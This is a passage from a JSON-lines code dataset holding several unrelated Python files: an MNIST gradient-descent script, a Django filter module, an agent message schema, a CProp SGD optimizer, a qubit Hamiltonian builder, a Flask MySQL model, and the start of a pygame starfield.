* EPS\n t = init_t.copy()\n prev_b = init_b - 10 * EPS\n b = init_b.copy()\n vt = 0\n vb = 0\n iter = 0\n perfomance_x = [perform(x, t, b, y)]\n perfomance_t = [perform(test, t, b, t_answer)]\n perfomance_v = [perform(validation, t, b, v_answer)]\n iterations = [0]\n print('Doing gradient Descent')\n while (np.linalg.norm(t - prev_t) + np.linalg.norm(\n b - prev_b)) > EPS and iter < max_iter:\n prev_t = t.copy()\n prev_b = b.copy()\n grad_t, grad_b = df(x, t, b, y)\n vt = gamma * vt + alpha * grad_t\n vb = gamma * vb + alpha * grad_b\n t -= vt\n b -= vb\n if iter % 100 == 0:\n print(\"Iter\", iter)\n print(\"f(x) = %.2f\" % (f(forward_p2(x, t, b), y)))\n # print(\"Gradient: \", df(x, t, b, y), \"\\n\")\n if plotCurve:\n perfomance_x.append(perform(x, t, b, y))\n perfomance_t.append(perform(test, t, b, t_answer))\n perfomance_v.append(perform(validation, t, b, v_answer))\n iterations.append(iter + 1)\n iter += 1\n if plotCurve:\n plt.plot(iterations, perfomance_x)\n plt.plot(iterations, perfomance_t)\n plt.plot(iterations, perfomance_v)\n plt.legend(['Training Set', 'Test Set', 'Validation Set'],\n loc='upper right')\n plt.axis([-30, max_iter, 0, 1])\n plt.ylabel('Prop. 
of correct guesses')\n plt.xlabel('Iterations')\n plt.show()\n print('Final Cost is ' + format(f(forward_p2(x, t, b), y), '.2f'))\n return t, b\n\n\ndef part5(iter, graph=True):\n x, y, test_set, answer_set, validation_set, v_answer_set = get_sets()\n init_t = np.zeros((784, 10))\n init_b = np.zeros((10, 1))\n t, b = grad_descent_m(cost, grad_p3, x, y, init_t, init_b, 0.00003, 0.9,\n iter,\n test_set, answer_set, validation_set,\n v_answer_set, graph) # 3000 has highest percentage\n np.savetxt('weight_m.txt', t)\n np.savetxt('bias_m.txt', b)\n\n\n################################ PART 6 ####################################\n\ndef part6_grad_descent_vanilla(x, y, b, init_w, alpha, max_iter, weight1, weight2, digit1, digit2):\n gd_traj = []\n\n w_adj = np.zeros([784, 10])\n w_adj[weight1][digit1] = 1\n w_adj[weight2][digit2] = 1\n\n EPS = 1e-5\n w = init_w.copy()\n prev_W = w - 10 * EPS\n iter = 0\n\n while norm(w - prev_W) > EPS and iter < max_iter:\n if iter % 1 == 0:\n # print(((w * w_adj)[weight1][digit1], (w * w_adj)[weight2][digit2]))\n gd_traj.append(((w * w_adj)[weight1][digit1], (w * w_adj)[weight2][digit2]))\n prev_W = w.copy()\n w -= alpha * grad_p3(x, w, b, y)[0] * w_adj\n iter += 1\n\n return gd_traj\n\n\ndef part6_grad_descent_momentum(x, y, b, init_w, alpha, gamma, max_iter, weight1, weight2, digit1, digit2):\n mo_traj = []\n\n w_adj = np.zeros([784, 10])\n w_adj[weight1][digit1] = 1\n w_adj[weight2][digit2] = 1\n\n EPS = 1e-5\n w = init_w.copy()\n prev_W = w - 10 * EPS\n iter = 0\n v = 0\n\n while norm(w - prev_W) > EPS and iter < max_iter:\n if iter % 1 == 0:\n # print(((w * w_adj)[weight1][digit1], (w * w_adj)[weight2][digit2]))\n mo_traj.append(((w * w_adj)[weight1][digit1], (w * w_adj)[weight2][digit2]))\n prev_W = w.copy()\n v = gamma * v + alpha * grad_p3(x, w, b, y)[0] * w_adj\n w -= v\n iter += 1\n\n return mo_traj\n\n\ndef part6a():\n w = np.loadtxt('weight_m.txt')\n b = np.loadtxt('bias_m.txt')\n b = b.reshape((10, 1))\n x = get_sets()[0]\n y 
= get_sets()[1]\n weight1 = 11 * 28 + 11\n weight2 = 17 * 28 + 17\n\n w1s = np.arange(-1.2, 1.1, 0.2)\n w2s = np.arange(-1.2, 1.1, 0.2)\n w1z, w2z = np.meshgrid(w1s, w2s)\n C = np.zeros([w1s.size, w2s.size])\n k = 0\n for i, w1 in enumerate(w1s):\n for j, w2 in enumerate(w2s):\n w[weight1][2] = w1\n w[weight2][2] = w2\n p = forward_p2(x, w, b)\n C[i, j] = cost(p, y)\n k += 1\n # print(k)\n\n CS = plt.contour(w1z, w2z, C, 15)\n plt.legend(loc='upper left')\n plt.clabel(CS, inline=1, fontsize=10)\n plt.title('Contour plot')\n plt.show()\n\n\ndef part6bc():\n w = np.loadtxt('weight_m.txt')\n b = np.loadtxt('bias_m.txt')\n b = b.reshape((10, 1))\n x = get_sets()[0]\n y = get_sets()[1]\n weight1 = 11 * 28 + 11\n weight2 = 17 * 28 + 17\n\n w[weight1][2] = 0.8\n w[weight2][2] = 0.8\n\n alpha = 0.0003\n gamma = 0.7\n\n gd_traj = part6_grad_descent_vanilla(x, y, b, w, alpha, 20, weight1, weight2, 2, 2)\n mo_traj = part6_grad_descent_momentum(x, y, b, w, alpha, gamma, 20, weight1, weight2, 2, 2)\n\n w1s = np.arange(-1.2, 1.1, 0.2)\n w2s = np.arange(-1.2, 1.1, 0.2)\n w1z, w2z = np.meshgrid(w1s, w2s)\n C = np.zeros([w1s.size, w2s.size])\n k = 0\n for i, w1 in enumerate(w1s):\n for j, w2 in enumerate(w2s):\n w[weight1][2] = w1\n w[weight2][2] = w2\n p = forward_p2(x, w, b)\n C[i, j] = cost(p, y)\n k += 1\n # print(k)\n\n CS = plt.contour(w1z, w2z, C, 15)\n plt.plot([a for a, b in gd_traj], [b for a, b in gd_traj], 'yo-', label=\"No Momentum\")\n plt.plot([a for a, b in mo_traj], [b for a, b in mo_traj], 'go-', label=\"Momentum\")\n plt.legend(loc='upper left')\n plt.clabel(CS, inline=1, fontsize=10)\n plt.title('Contour plot')\n plt.show()\n\n\ndef part6e():\n w = np.loadtxt('weight_m.txt')\n b = np.loadtxt('bias_m.txt')\n b = b.reshape((10, 1))\n x = get_sets()[0]\n y = get_sets()[1]\n weight1 = 0\n weight2 = 783\n\n w[weight1][2] = 0.8\n w[weight2][2] = 0.8\n\n alpha = 0.0003\n gamma = 0.7\n\n gd_traj = part6_grad_descent_vanilla(x, y, b, w, alpha, 20, weight1, weight2, 2, 
2)\n mo_traj = part6_grad_descent_momentum(x, y, b, w, alpha, gamma, 20, weight1, weight2, 2, 2)\n\n w1s = np.arange(-1.2, 1.1, 0.2)\n w2s = np.arange(-1.2, 1.1, 0.2)\n w1z, w2z = np.meshgrid(w1s, w2s)\n C = np.zeros([w1s.size, w2s.size])\n k = 0\n for i, w1 in enumerate(w1s):\n for j, w2 in enumerate(w2s):\n w[weight1][2] = w1\n w[weight2][2] = w2\n p = forward_p2(x, w, b)\n C[i, j] = cost(p, y)\n k += 1\n # print(k)\n\n CS = plt.contour(w1z, w2z, C, 15)\n plt.plot([a for a, b in gd_traj], [b for a, b in gd_traj], 'yo-', label=\"No Momentum\")\n plt.plot([a for a, b in mo_traj], [b for a, b in mo_traj], 'go-', label=\"Momentum\")\n plt.legend(loc='upper left')\n plt.clabel(CS, inline=1, fontsize=10)\n plt.title('Contour plot')\n plt.show()\n\n\nif __name__ == \"__main__\":\n # showDigits()\n\n M = loadmat(\"mnist_all.mat\")\n x = M[\"train5\"][148:149].T / 255.0\n result = forward_p2(x, np.random.rand(784, 10), 0.2)\n # print(result)\n\n # part3()\n #\n # part4(1500)\n #\n # part5(1500)\n\n # part6a()\n\n # part6bc()\n\n part6e()","sub_path":"36/proj2/digits_part6.py","file_name":"digits_part6.py","file_ext":"py","file_size_in_byte":15295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"421608807","text":"from django.contrib.auth.models import User\nimport django_filters\nfrom django.http import JsonResponse, HttpResponse\nfrom .models import Album\nfrom django_filters import filters\nfrom filters.views import FilterMixin\nfrom . 
import views\nimport music.views\nfrom django.shortcuts import get_object_or_404\n\nUZYTKOWNICY = User.objects.all().order_by('username').values_list(\"id\",\"username\").distinct()\nUZYTKOWNICY = list(UZYTKOWNICY)\n# UZYTKOWNICY.insert(0, ('0','---------') )\nUZYTKOWNICY.pop(3)\n\nAKTYWNOWSCI = Album.objects.all().order_by('aktywnosc').values_list(\"aktywnosc\",\"aktywnosc\").distinct()\nAKTYWNOWSCI = list(AKTYWNOWSCI)\n# AKTYWNOWSCI.insert(0, ('','---------') )\n\nMIASTA = Album.objects.all().order_by('miejscowosc').values_list(\"miejscowosc\",\"miejscowosc\").distinct()\nMIASTA = list(MIASTA)\n# MIASTA.insert(0, ('0','---------') )\n\nKODY = Album.objects.all().values_list(\"kodpocztowy\",\"kodpocztowy\").distinct()\nKODY = list(KODY)\n# KODY.insert(0, ('0','---------') )\n\n# TERMINY = Album.objects.all().values_list(\"termin\",\"termin\").distinct()\n# IMPORTOWANA = music.views.ZMIENNAGLOBALNA\n# INNEMIASTA = Album.objects.filter(aktywnosc='Urlop').values_list('miejscowosc', 'miejscowosc').distinct()\n\nUSER_IDs = []\nAKTYWNOWSCI_IDs = []\n\ndef dynamiczne_filtrowanie(request):\n\n ajax_aktywnosc = request.GET.get('aktywnosc', False)\n ajax_user = request.GET.get('user', False)\n print (\"To jest user ktory przyszedł %s.\" % ajax_user)\n print (type(ajax_user))\n\n global AKTYWNOWSCI_IDs\n global USER_IDs\n global uzytkownik\n print (ajax_aktywnosc)\n\n # if ajax_user == \"user=\":\n # print ('jestem false')\n # else:\n # print('nie jestm false')\n if not ajax_user:\n USER_IDs = []\n else:\n user_dane = ajax_user.split('&')\n USER_IDs = []\n for x in user_dane:\n y = x.split('=')[1]\n # USER_IDs = []\n if y==\"0\":\n user = User.objects.all()\n print(user)\n else:\n USER_IDs.append(int(y))\n\n print (\"To sa uzytkownicy %s.\" % USER_IDs)\n print (\"To jest aktywnoc ktora przyszla %s.\" % ajax_aktywnosc)\n\n\n if not ajax_aktywnosc:\n AKTYWNOWSCI_IDs = []\n else:\n aktywnosci_dane = ajax_aktywnosc.split('&')\n AKTYWNOWSCI_IDs = []\n print (\"aktywnosci_dane 
%s.\" % aktywnosci_dane)\n for x in aktywnosci_dane:\n x = x.replace(\"+\", \" \")\n y = x.split('=')[1]\n AKTYWNOWSCI_IDs.append(y)\n # USER_IDs = []\n\n print (\"To sa aktywnosci %s.\" % AKTYWNOWSCI_IDs)\n\n\n\n\n # if y==\"\":\n # user = User.objects.all()\n # print(user)\n # USER_IDs = []\n # for a in user:\n # USER_IDs.append(a.id)\n # print (a.id)\n # return (USER_IDs)\n # else:\n # USER_IDs.append(int(y))\n\n\n\n\n # if ajax_user != \"user=\":\n # user_dane = ajax_user.split('&')\n # USER_IDs = []\n # for x in user_dane:\n # y = x.split('=')[1]\n # USER_IDs.append(int(y))\n # else:\n # user = User.objects.all()\n # USER_IDs = []\n # for x in user:\n # USER_IDs.append(x.id)\n\n\n\n\n # if ajax_aktywnosc != False:\n # dane = ajax_aktywnosc.split(\"&\")\n # AKTYWNOWSCI_IDs =[]\n # for x in dane:\n # x = x.replace(\"+\", \" \")\n # AKTYWNOWSCI_IDs.append(x.split('=')[1])\n # print(x)\n # print (AKTYWNOWSCI_IDs)\n # return(AKTYWNOWSCI_IDs)\n\n # return JsonResponse(dane, safe=False)\n return HttpResponse(AKTYWNOWSCI_IDs, USER_IDs)\n\n\n\nclass UserFilter(django_filters.FilterSet):\n # product_choices = {\n # '': ('---------', ''),\n # 'fresh': ('Fresh', { 'method': 'age_group', 'args': ('fresh', ), }),\n # 'regular': ('Regular', {'method': 'age_group', 'args': ('regular', ), }),\n # 'old': ('Old', {'method': 'age_group', 'args': ('old', ), }),}\n user = django_filters.MultipleChoiceFilter(choices=UZYTKOWNICY)\n aktywnosc = django_filters.MultipleChoiceFilter(choices=AKTYWNOWSCI)\n miejscowosc = django_filters.MultipleChoiceFilter(choices=MIASTA)\n kodpocztowy = django_filters.MultipleChoiceFilter(choices=KODY)\n # miejscowosc = django_filters.ModelMultipleChoiceFilter(queryset=Album.objects.all().values_list('miejscowosc').distinct())\n # miejscowosc = QuerySetFilter(product_choices, label='Product age choices')\n\n termin = django_filters.DateFromToRangeFilter()\n\n\n class Meta:\n model = Album\n fields = ['aktywnosc', 'miejscowosc', 'kodpocztowy', 'termin', 
'user']\n\n def __init__(self, *args, **kwargs):\n super(UserFilter, self).__init__(*args, **kwargs)\n\n # def __init__(self, *args, **kwargs):\n # print('to jest init')\n # super(UserFilter, self).__init__(*args, **kwargs)\n # print(\"to jest AKTYWNOWSCI_IDs %s.\" % AKTYWNOWSCI_IDs)\n # print(\"AKTYWNOWSCI_IDs uzytkownikow %s.\" % USER_IDs)\n #\n #\n if USER_IDs == [] and AKTYWNOWSCI_IDs == []:\n print ('AKTYWNOWSCI_IDs jest pusta')\n self.filters['aktywnosc'].extra.update(\n {\n 'choices': AKTYWNOWSCI\n })\n self.filters['miejscowosc'].extra.update(\n {\n 'choices': MIASTA\n })\n self.filters['kodpocztowy'].extra.update(\n {\n 'choices': KODY\n })\n else:\n aktywnosci_temp = []\n for x in USER_IDs:\n x = Album.objects.filter(user_id=x).values_list('aktywnosc', 'aktywnosc').distinct()\n aktywnosci_temp.extend(x)\n # aktywnosci_temp.insert(0, ('','---------') )\n aktywnosci = list(set(aktywnosci_temp))\n self.filters['aktywnosc'].extra.update(\n {\n 'choices': sorted(aktywnosci)\n })\n\n cities = []\n for x in AKTYWNOWSCI_IDs:\n x = Album.objects.filter(aktywnosc=x).values_list('miejscowosc', 'miejscowosc').distinct()\n cities.extend(x)\n print (\"to są miasta %s.\" % cities)\n\n self.filters['miejscowosc'].extra.update(\n {\n 'choices': sorted(cities)\n })\n\n\n\n\n self.filters['kodpocztowy'].extra.update(\n {\n 'choices': []\n })\n\n\n\n\n #\n #\n\n #\n #\n #\n #\n # print(\"aktywnosci w inicie %s.\" % aktywnosci)\n #\n # # if USER_IDs == []:\n # # self.filters['aktywnosc'].extra.update(\n # # {\n # # 'choices': sorted(ZDARZENIA_FILTR)\n # # })\n # # else:\n # # self.filters['aktywnosc'].extra.update(\n # # {\n # # 'choices': sorted(aktywnosci)\n # # })\n #\n # cities = []\n # cities.insert(0, ('','---------') )\n # for x in USER_IDs:\n # x = Album.objects.filter(user_id=x).values_list('miejscowosc', 'miejscowosc').distinct()\n # cities.extend(x)\n # # print (\"to są miasta %s.\" % cities)\n # codes = []\n # for x in USER_IDs:\n # x = 
Album.objects.filter(user_id=x).values_list('kodpocztowy', 'kodpocztowy').distinct()\n # codes.extend(x)\n # print (codes)\n # if cities == []:\n #\n # # else:\n # self.filters['kodpocztowy'].extra.update(\n # {\n # 'choices': codes\n # })\n #\n #\n # if cities == []:\n # self.filters['miejscowosc'].extra.update(\n # {\n # 'choices': sorted(MIASTALISTA)\n # })\n # else:\n # self.filters['miejscowosc'].extra.update(\n # {\n # 'choices': sorted(cities)\n # })\n\n\n\n\n\n\n\n # print(Album.objects.filter(aktywnosc=AKTYWNOWSCI_IDs[0]).values_list('miejscowosc', 'miejscowosc').distinct())\n # INNEMIASTA = Album.objects.filter(aktywnosc='Wizyta').values_list('miejscowosc', 'miejscowosc').distinct()\n # miejscowosc = django_filters.MultipleChoiceFilter(choices=INNEMIASTA)\n # return(miejscowosc)\n # print(MIASTA)\n # print(miastab)\n # # cos['aktywnosc'].choices = Album.objects.all().values_list(\"miejscowosc\",\"miejscowosc\").distinct()\n # # print(choices)\n #\n # for name, field in self.filters.items():\n # if isinstance(field, django_filters.ChoiceFilter):\n # # Add \"Any\" entry to choice fields.\n # field.extra['choices'] = tuple([(\"\", \"Any\"), ] + list(field.extra['choices']))\n","sub_path":"Viberr-master/music/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":8970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"58631636","text":"\"\"\"Represents the attached message to be included in the connection record.\"\"\"\n\nfrom marshmallow import EXCLUDE, fields\n\nfrom .....messaging.agent_message import AgentMessage, AgentMessageSchema\n\nfrom ..message_types import ATTACHED_MESSAGE\n\n\nclass MessagesAttach(AgentMessage):\n \"\"\"Class representing the attached message.\"\"\"\n\n class Meta:\n \"\"\"Metadata for attached message class.\"\"\"\n\n schema_class = \"MessagesAttachSchema\"\n message_type = ATTACHED_MESSAGE\n\n def __init__(\n self,\n *,\n tx_my_role:str = None,\n 
tx_their_role:str = None,\n **kwargs\n ):\n \"\"\"\n Initialize the attached message object.\n\n Args:\n tx_my_role: My role in the connection - related to endorsement protocol\n tx_their_role: Their role in the connection - related to endorsement protocol\n \"\"\"\n\n super().__init__(**kwargs)\n\n self.mime_type = \"application/json\"\n\n self.lastmod_time = \"time\"\n\n self.description = \"The roles related to endorsement protocol\"\n\n self.data = {\n \"json\": {\n \"tx_my_role\":[],\n \"tx_their_role\":[]\n },\n } \n\n\nclass MessagesAttachSchema(AgentMessageSchema):\n \"\"\"Attached Message schema class.\"\"\"\n\n class Meta:\n \"\"\"Attached message schema metadata.\"\"\"\n\n model_class = MessagesAttach\n unknown = EXCLUDE\n\n mime_type = fields.Str(required=True)\n lastmod_time = fields.Str(required=True)\n description = fields.Str(required=True)\n data = fields.Dict(required=True)","sub_path":"aries_cloudagent/protocols/connections/v1_0/messages/messages_attach.py","file_name":"messages_attach.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"87117170","text":"import torch\nfrom torch.optim import Optimizer\n\nfrom .cprop_lib import *\n\n\nclass CPropSGD(Optimizer):\n \"\"\"\n CProp-augmented SGD. 
\n Based on Pytorch's SGD.\n \"\"\"\n def __init__(\n self,\n params,\n lr,\n cprop_beta=0.999,\n cprop_c=1,\n cprop_eps=1e-8,\n cprop_cdf='bft',\n momentum=0,\n dampening=0,\n weight_decay=0,\n nesterov=False,\n ):\n if not 0.0 <= cprop_eps:\n raise ValueError(\"Invalid cprop_eps value: {}\".format(cprop_eps))\n if not 0.0 <= cprop_c:\n raise ValueError(\"Invalid cprop_c value: {}\".format(cprop_c))\n if not 0.0 <= cprop_beta < 1.0:\n raise ValueError(\n \"Invalid cprop_beta parameter: {}\".format(cprop_beta))\n\n if not 0.0 <= lr:\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\n if momentum < 0.0:\n raise ValueError(\"Invalid momentum value: {}\".format(momentum))\n if weight_decay < 0.0:\n raise ValueError(\n \"Invalid weight_decay value: {}\".format(weight_decay))\n\n defaults = dict(\n cprop_beta=cprop_beta,\n cprop_c=cprop_c,\n cprop_eps=cprop_eps,\n cprop_cdf=cprop_cdf,\n lr=lr,\n momentum=momentum,\n dampening=dampening,\n weight_decay=weight_decay,\n nesterov=nesterov,\n )\n if nesterov and (momentum <= 0 or dampening != 0):\n raise ValueError(\n \"Nesterov momentum requires a momentum and zero dampening\")\n super(CPropSGD, self).__init__(params, defaults)\n\n def __setstate__(self, state):\n super(CPropSGD, self).__setstate__(state)\n for group in self.param_groups:\n group.setdefault('nesterov', False)\n\n def step(self, closure=None):\n \"\"\"Performs a single optimization step.\n\n Arguments:\n closure (callable, optional): A closure that reevaluates the model\n and returns the loss.\n \"\"\"\n loss = None\n if closure is not None:\n loss = closure()\n\n for group in self.param_groups:\n beta = group['cprop_beta']\n c = group['cprop_c']\n eps = group['cprop_eps']\n cdf = group['cprop_cdf']\n\n weight_decay = group['weight_decay']\n momentum = group['momentum']\n dampening = group['dampening']\n nesterov = group['nesterov']\n\n for p in group['params']:\n if p.grad is None:\n continue\n d_p = p.grad.data\n state = self.state[p]\n\n # 
calculate the cprop scales\n s = cprop(state, d_p, beta, c, eps, cdf)\n\n if weight_decay != 0:\n d_p.add_(weight_decay, p.data)\n if momentum != 0:\n param_state = self.state[p]\n if 'momentum_buffer' not in param_state:\n buf = param_state['momentum_buffer'] = torch.clone(\n d_p).detach()\n else:\n buf = param_state['momentum_buffer']\n buf.mul_(momentum).add_(1 - dampening, d_p)\n if nesterov:\n d_p = d_p.add(momentum, buf)\n else:\n d_p = buf\n\n # scale the gradient update\n p.data.addcmul_(-group['lr'], d_p, s)\n\n return loss\n","sub_path":"cprop/cprop_sgd.py","file_name":"cprop_sgd.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"271239665","text":"\"\"\"\nCompute the Hamiltonian of the system.\n\"\"\"\nimport itertools\nimport numbers\nimport numpy as np\nimport sympy\n\nimport qutip\nimport theano\nimport theano.tensor as T\n\nfrom .utils import complex2bigreal\n\n\ndef pauli_product(*args):\n \"\"\"\n Return sympy.Matrix object represing product of Pauli matrices.\n\n Examples\n --------\n >>> pauli_product(1, 1)\n Matrix([[0, 0, 0, 1],\n [0, 0, 1, 0],\n [0, 1, 0, 0],\n [1, 0, 0, 0]])\n \"\"\"\n for arg in args:\n try:\n if not 0 <= arg <= 3:\n raise ValueError('Each argument must be between 0 and 3.')\n except TypeError:\n raise ValueError('The inputs must be integers.')\n n_qubits = len(args)\n sigmas = [qutip.qeye(2), qutip.sigmax(), qutip.sigmay(), qutip.sigmaz()]\n output_matrix = [None] * n_qubits\n for idx, arg in enumerate(args):\n output_matrix[idx] = sigmas[arg]\n output_matrix = qutip.tensor(*output_matrix).data.toarray()\n return sympy.Matrix(output_matrix)\n\n\ndef _self_interactions(num_qubits):\n \"\"\"Return the indices corresponding to the self-interactions.\"\"\"\n interactions = []\n for qubit in range(num_qubits):\n for pindex in range(1, 4):\n term = [0] * num_qubits\n term[qubit] = pindex\n interactions.append(tuple(term))\n return 
interactions\n\n\ndef _pairwise_interactions(num_qubits):\n \"\"\"\n Return the indices corresponding the the pairwise interactions.\n \"\"\"\n interactions = []\n pairs = itertools.combinations(range(num_qubits), 2)\n for qubit1, qubit2 in pairs:\n for pindex1, pindex2 in itertools.product(*[range(1, 4)] * 2):\n term = [0] * num_qubits\n term[qubit1] = pindex1\n term[qubit2] = pindex2\n interactions.append(tuple(term))\n return interactions\n\n\ndef _self_and_pairwise_interactions(num_qubits):\n \"\"\"Return list of all possible one- and two-qubit interactions.\"\"\"\n return _self_interactions(num_qubits) + _pairwise_interactions(num_qubits)\n\n\nclass QubitNetworkHamiltonian:\n \"\"\"Compute the Hamiltonian for the qubit network.\n\n The Hamiltonian can be generated in several different ways, depending\n on the arguments given. Note that `QubitNetworkHamiltonian` is not\n supposed to know anything about ancillae, system qubits and so on.\n This class is only to parse input arguments (interactions, topology\n or sympy expression) in order to extract free symbols and matrix\n coefficients of a whole qubit network. The distinction between\n system and ancillary qubits comes next with `QubitNetwork`.\n\n Parameters\n ----------\n num_qubits : int,\n Number of qubits in the network.\n parameters : string, tuple or list, optional\n If given, it is used to use the parameters in some predefined\n way. 
Possible values are:\n - 'all': use all 1- and 2-qubit interactions, each one with a\n different parameter assigned.\n - ('all', (...)): use the specified types of intereactions for\n all qubits.\n - list of interactions: use all and only the given interactions.\n \"\"\"\n\n def __init__(self,\n num_qubits=None,\n expr=None,\n free_parameters_order=None,\n interactions=None,\n net_topology=None):\n # initialize class attributes\n self.num_qubits = None # number of qubits in network\n self.matrices = None # matrix coefficients for free parameters\n self.free_parameters = None # symbolic parameters of the model\n self.interactions = None # list of active interactions, if meaningful\n self.net_topology = None\n\n # Extract lists of parameters and matrices to which each is to\n # be multiplied\n if expr is not None:\n self._parse_sympy_expr(expr, free_parameters_order)\n elif interactions is not None:\n self._parse_from_interactions(num_qubits, interactions)\n elif net_topology is not None:\n self._parse_from_topology(num_qubits, net_topology)\n else:\n raise ValueError('One of `expr`, `interactions` or '\n '`net_topology` must be given.')\n\n def _parse_sympy_expr(self, expr, free_parameters_order=None):\n \"\"\"\n Extract free parameters and matrix coefficients from sympy expr.\n \"\"\"\n try:\n if free_parameters_order is not None:\n self.free_parameters = free_parameters_order\n else:\n self.free_parameters = list(expr.free_symbols)\n _len = expr.shape[0]\n except TypeError:\n raise TypeError('`expr` must be a sympy MatrixSymbol object.')\n # initialize the list of matrices to which each parameter is multiplied\n self.matrices = []\n # extract the matrix to which each element is multiplied\n for parameter in self.free_parameters:\n self.matrices.append(expr.diff(parameter))\n # extract and store number of qubits of Hamiltonian\n self.num_qubits = int(np.log2(_len))\n\n def _parse_from_interactions(self, num_qubits, interactions):\n \"\"\"\n Use value of 
`interactions` to compute parametrized Hamiltonian.\n\n When the Hamiltonian is derived from the `interactions`\n parameter, also the `self.interactions` attribute is filled,\n storing the indices corresponding to the interactions that are\n being used (as opposite to what happens when the Hamiltonian is\n computed from a sympy expression).\n \"\"\"\n def make_symbols_and_matrices(interactions):\n self.free_parameters = []\n self.matrices = []\n for interaction in interactions:\n # create free parameter sympy symbol for interaction\n new_symb = 'J' + ''.join(str(idx) for idx in interaction)\n self.free_parameters.append(sympy.Symbol(new_symb))\n # create matrix coefficient for symbol just created\n self.matrices.append(pauli_product(*interaction))\n # store number of qubits in class\n if num_qubits is None:\n raise ValueError('The number of qubits must be given.')\n else:\n self.num_qubits = num_qubits\n\n if interactions == 'all':\n self.interactions = _self_and_pairwise_interactions(num_qubits)\n # a tuple of the kind `('all', ((1, 1), (2, 2)))` means that all\n # XX and YY interactions, and no others, should be used.\n elif isinstance(interactions, tuple) and interactions[0] == 'all':\n _interactions = _self_and_pairwise_interactions(num_qubits)\n self.interactions = []\n # filter list of interactions using given filter\n mask = [sorted(tup) for tup in interactions[1]]\n for interaction in _interactions:\n no_zeros = sorted([idx for idx in interaction if idx != 0])\n if no_zeros in mask:\n self.interactions.append(interaction)\n elif isinstance(interactions, list):\n self.interactions = interactions\n # store values of symbols and matrices for chosen interactions\n make_symbols_and_matrices(self.interactions)\n\n def _parse_from_topology(self, num_qubits, topology):\n \"\"\"\n Use value of `topology` to compute parametrized Hamiltonian.\n\n The expected value of `topology` is a dictionary like:\n {((1, 2), 'xx'): 'a',\n ((0, 2), 'xx'): 'a',\n ((0, 1), 'zz'): 
'b',\n ((1, 2), 'xy'): 'c'}\n or a dictionary like:\n {(0, 1, 1): a,\n (1, 0, 1): a,\n (3, 3, 0): b,\n (0, 1, 2): c}\n where `a`, `b` and `c` are `sympy.Symbol` instances.\n \"\"\"\n self.num_qubits = num_qubits\n self.net_topology = topology\n # ensure that all values are sympy symbols\n all_symbols = [sympy.Symbol(str(symb)) for symb in topology.values()]\n # take list of not equal symbols\n symbols = list(set(all_symbols))\n # we try to sort the symbols, but if they are sympy symbols this\n # will fail with a TypeError, in which case we just give up and\n # leave them in whatever order they come out of `set`\n try:\n symbols = sorted(symbols)\n except TypeError:\n symbols = list(symbols)\n self.free_parameters = symbols\n # parse target tuples so that (2, 2) represents the YY interaction\n target_tuples = []\n for tuple_ in topology.keys():\n if isinstance(tuple_[1], str):\n str_spec = list(tuple_[1])\n new_tuple = [0] * num_qubits\n for idx, char in zip(tuple_[0], str_spec):\n if char == 'x':\n new_tuple[idx] = 1\n elif char == 'y':\n new_tuple[idx] = 2\n elif char == 'z':\n new_tuple[idx] = 3\n else:\n raise ValueError('Only x, y or z are valid.')\n target_tuples.append(tuple(new_tuple))\n else:\n target_tuples.append(tuple_)\n # Extract matrix coefficients for storing\n # The i-th element of `J` will correspond to the\n # interactions terms associated to the i-th symbol listed\n # in `symbols` (after sorting).\n self.matrices = []\n for idx, symb in enumerate(symbols):\n factor = sympy.Matrix(np.zeros((2 ** num_qubits,) * 2))\n for tuple_, label in zip(target_tuples, all_symbols):\n if label == symb:\n factor += pauli_product(*tuple_)\n self.matrices.append(factor)\n\n def get_matrix(self):\n \"\"\"Return the Hamiltonian matrix as a sympy matrix object.\"\"\"\n # final_matrix = sympy.MatrixSymbol('H', *self.matrices[0].shape)\n final_matrix = sympy.Matrix(np.zeros(self.matrices[0].shape))\n for matrix, parameter in zip(self.matrices, self.free_parameters):\n 
final_matrix += parameter * matrix\n return final_matrix\n","sub_path":"src/qubit_network/hamiltonian.py","file_name":"hamiltonian.py","file_ext":"py","file_size_in_byte":10229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"415597330","text":"from config.mysqlconnection import connectToMySQL\n\nclass ninja:\n def __init__(self, data):\n self.id = data['id']\n self.first_name = data['first_name']\n self.last_name = data['last_name']\n self.age = data['age']\n self.dojo_id = data['dojo_id']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n \n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM ninjas;\"\n results = connectToMySQL('dojos-and-ninjas').query_db(query)\n ninjas = []\n for ninja in results:\n ninjas.append( cls(ninja))\n return ninjas\n\n @classmethod\n def save(cls, data):\n query =\"INSERT INTO ninjas ( first_name, last_name, age, dojo_id, created_at, updated_at) VALUES( %(first_name)s, %(last_name)s, %(age)s, %(dojo_id)s, NOW(), NOW())\"\n returned_id = connectToMySQL('dojos-and-ninjas').query_db(query, data)\n return returned_id\n\n @classmethod\n def get_ninjas_by_dojo_id(cls, data):\n query = \"SELECT * FROM ninjas WHERE dojo_id = %(id)s;\"\n results = connectToMySQL('dojos-and-ninjas').query_db(query, data)\n ninjas = []\n for ninja in results:\n ninjas.append( cls(ninja))\n return ninjas\n","sub_path":"flask_app/models/ninjas.py","file_name":"ninjas.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"361129582","text":"#!/usr/bin/env python\n\nimport random, math, pygame\nfrom pygame.locals import *\nfrom settings import window\n\n#constants\nNUMSTARS = 200\nSTAR_COLOR = 255, 240, 200\nSKY_COLOR = 20, 20, 40\n\n\ndef init_star():\n \"\"\"Creates new star values.\"\"\"\n dir = -random.random()\n velmult = 20\n vel = [dir * velmult, 0]\n return vel, 
